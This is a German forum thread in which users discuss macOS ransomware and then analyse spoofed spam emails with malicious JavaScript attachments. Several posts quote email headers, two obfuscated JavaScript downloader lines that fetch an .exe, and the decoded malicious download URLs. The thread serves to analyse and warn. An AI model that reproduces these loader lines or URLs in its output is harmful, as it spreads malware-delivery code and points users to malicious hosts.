Verschlüsselungstrojaner nun auch auf OSX

theoth

Active Member
hmm - übel. Ist zwar eine Software, die man extra installieren muß, aber immerhin mit einer Apple-developer-signatur signiert.
Das gibt mir zu denken, denn die gültige Signatur ist alles, was man als user (egal, welches OS) hat, um Software für sauber zu halten.
Transmission wäre bei mir nicht tragisch, den das läuft abgeschottet und könnte keinen Schaden anrichten - aber was, wenn eine der Haupt-utilities gehackt wird?
Da hilft nur noch penibles backup...
 

PP Frank

Staff member
Im Endeffekt gilt eben auch hier die Regel: Nur Software zu installieren die man unbedingt braucht. Ich selber nutze fast ausschliesslich Software aus dem App-Store. Alles was nicht im App-Store ist, da muss das schon extrem dringend sein, das ich das installiere. Von Torrent und Co lasse ich eh die Finger. Wenn dann OCH und da gibt es ja eh nur vernünftig den jDownloader.... Von daher halten sich dann die kritischen Quellen in engen Grenzen
 

theoth

Active Member
Gibt leider nicht immer alles was man gerne haben will in einer Distri (=appstore). Ich arbeite viel mit copy/paste und habe copyQ als geeignet dafür entdeckt - ist leider nicht in der Distri, muß also extra installiert werden. Gleiches gilt noch für ein paar andere Klamotten. Die sind zwar alle signiert, aber das war transmission ja auch...
Die Sachen laufen alle als normaler user, können also auch nur die Daten des users zerstören - übel wäre es aber dennoch.
Mein Backup (rsnapshot) sichert zwar extrem schnell, ist aber nicht unbedingt auf schnelles Wiederherstellen angelegt.
Das Zeug landet per pull auf einer extra VM und müßte dann entweder manuell zurückkopiert werden oder ich müßte schnell ein script dafür basteln.
Halte ich übrigens für eine viel sichere Methode, als wenn die backup-software auf demselben System läuft, welches gesichert werden soll.

Torrent ist zum 'runterladen von Distries (z.B. auch Wi(n)dows 10 :-o ) eine der schnellsten Möglichkeiten - da kriegt man seine Bandbreite mal voll ausgeschöpft.
 

theoth

Active Member
Der scheint tatsächlich über Apple-Hardware verbreitet zu werden. Heute zwei E-mails (angeblich von mir selbst) bekommen:
Code:
Return-Path: <meine-email>
Received: from mail... ([unix socket])
    by ... (Cyrus v2...)
    Tue, 22 Mar 2016 12:20:14 +0100
X-Sieve: CMU Sieve 2.4
Received: from 62.117.207.203.dyn.user.ono.com (62.117.207.203.dyn.user.ono.com [62.117.207.203])
   by mail... (8.14.4/8.14.4/Debian-8) with ESMTP id u2MBKBYV008265
   for <meine-email>; Tue, 22 Mar 2016 12:20:14 +0100
Content-Type: multipart/mixed; boundary="----------=_56F12A6E.AF90EC74"
Content-Transfer-Encoding: 7bit
From: <meine-email>
Mime-Version: 1.0 (1.0)
Date: Mon, 21 Mar 2016 23:20:04 -1200 <------------- weit weg, 13 Stunden
Subject: Document 2
Message-Id: <Apple-Mail-4657B8D6-569F-D1F2-E654-9402C42D98FC@xxxx>
To: <meine-email>
X-Mailer: iPhone Mail (13B143) <---------------------------iPhone?
X-Virus-Scanned: clamav-milter 0.98.7 at ...
X-Virus-Status: Clean <----------------------------- clamav findet nix
X-Spam-Flag: YES <--------------------------- immerhin als Spam markiert
Da fragt man sich, wie die an die E-mail adresse kommen - immerhin ist das ein privater mail-server mit privater Domain und die Adresse kennen vielleicht zwanzig Leute.
Der Anhang war das übliche javascript, wo dann mäßig verschleiert was nachgeladen wird:
Code:
undeveloped("htt"+"p://pala"+("shape","relentless","spray","ha")+"si"+"t."+("priestcraft","lined","morrison","co")+"m/system"+("older","sword","/l")+"og"+"s/98"+"h7"+"b6"+"6gb."+"exe","yROdkAds");
...
Windows-User leben momentan sehr gefährlich...
 

JackCarver

Well-known Member
From Spoofing, das hab ich auch ab und an bei einer meiner Mailadressen. Scheint zur Zeit Konjunktur zu haben...

Code:
Return-Path: <meine-email>
Delivered-To: meine-email
Received: from localhost (localhost [127.0.0.1]) by mein.mailserver (Postfix) with ESMTP id 80B5B9C3190 for <meine-email>; Tue, 22 Mar 2016 13:08:49 +0100 (CET)
Received: from mein.mailserver ([127.0.0.1]) by localhost (mein.mailserver [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id J3qttZTZlFhX for <meine-email>; Tue, 22 Mar 2016 13:08:19 +0100 (CET)
Received: from [175.101.80.140] (unknown [175.101.80.140]) by mein.mailserver (Postfix) with ESMTP id 519259C3158 for <mein.mailserver>; Tue, 22 Mar 2016 13:08:19 +0100 (CET)
X-Virus-Scanned: Debian amavisd-new at mein.mailserver
X-Spam-Flag: YES
X-Spam-Score: 9.123
X-Spam-Level: *********
X-Spam-Status: Yes, score=9.123 required=5 tests=[RCVD_IN_BL_SPAMCOP_NET=1.246, RCVD_IN_BRBL_LASTEXT=1.644, RCVD_IN_PSBL=2.7, RCVD_IN_SORBS_WEB=0.614, RCVD_IN_XBL=0.724, RDNS_NONE=1.274, SPF_FAIL=0.919, TO_EQ_FM_DOM_SPF_FAIL=0.001, TO_EQ_FM_SPF_FAIL=0.001] autolearn=no
Content-Type: multipart/mixed; boundary=Apple-Mail-CB8DC4AD-B89E-802D-FDB9-B7DD49074A5E
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0 (1.0)
Message-Id: <Apple-Mail-CB8DC4AD-B89E-802D-FDB9-B7DD49074A5E@meine-domain>
X-Mailer: iPhone Mail (13B143)
***SPAM*** Document 2

Ich kann mir aber nicht vorstellen, dass das von nem iPhone versendet wurde?? Was sich hinter Document2.zip befindet will ich gar nicht wissen.
 

theoth

Active Member
Hmm - daß die spoofen ist klar, nur warum die ein Ziel mit nur einer handvoll Teilnehmern wählen ist mir ein Rätsel.
Bei Yahoo und Konsorten kann man die mails ja würfeln und es kommt fast immer an, aber hier?

Der Anhang ist nix schlimmes - holt sich die 98h7b66gb.exe von http://palahasit.com/system/logs/
Dort seht allerdings nur drin: "STUPID LOCKY"

Dafür scheint der server sperrangelweit offen zu stehen. Ist vielleicht nur ein HoneyPot.
 

Dr_Iwan_Kakalakow

Active Member
@theoth,
wenn ich Deinen Link aufrufe, sagt mir meine Firewall:
Schädliche Website blockiert.
Diese Website wurde als schädlich gemeldet.
Wir empfehlen Ihnen, die Website nicht aufzurufen.
 

JackCarver

Well-known Member
Code:
undeveloped("h"+"tt"+"p://he"+("yeast","television","integration","investing","lihangar")+("vegetables","addiction","proprietary","gotten",".co.uk/s")+("tablespoon","explain","ystem/")+"logs"+"/98h7b66gb.exe","yROdkAds");

Ok hier scheint es die 98h7b66gb.exe von http://he.co.uk/system/logs/ zu sein...

Die exe scheint stets dieselbe zu sein, nur von unterschiedlichen Servern.
 

JackCarver

Well-known Member
wenn ich Deinen Link aufrufe, sagt mir meine Firewall:
Schädliche Website blockiert.
Diese Website wurde als schädlich gemeldet.
Wir empfehlen Ihnen, die Website nicht aufzurufen.
Wir reden ja grade von Adressen, die Malware verbreiten, also bitte nicht anklicken das ganze.
 

JackCarver

Well-known Member
Das war vorhin etwas zu schnell ;-)

Das erste muss helihangar heißen. Der Server hat die Ports 80 und 443 offen, einen Zugriff, so wie in deinem Fall auf /system/Logs verweigert er allerdings. Laden kannst nur die .exe
 
Top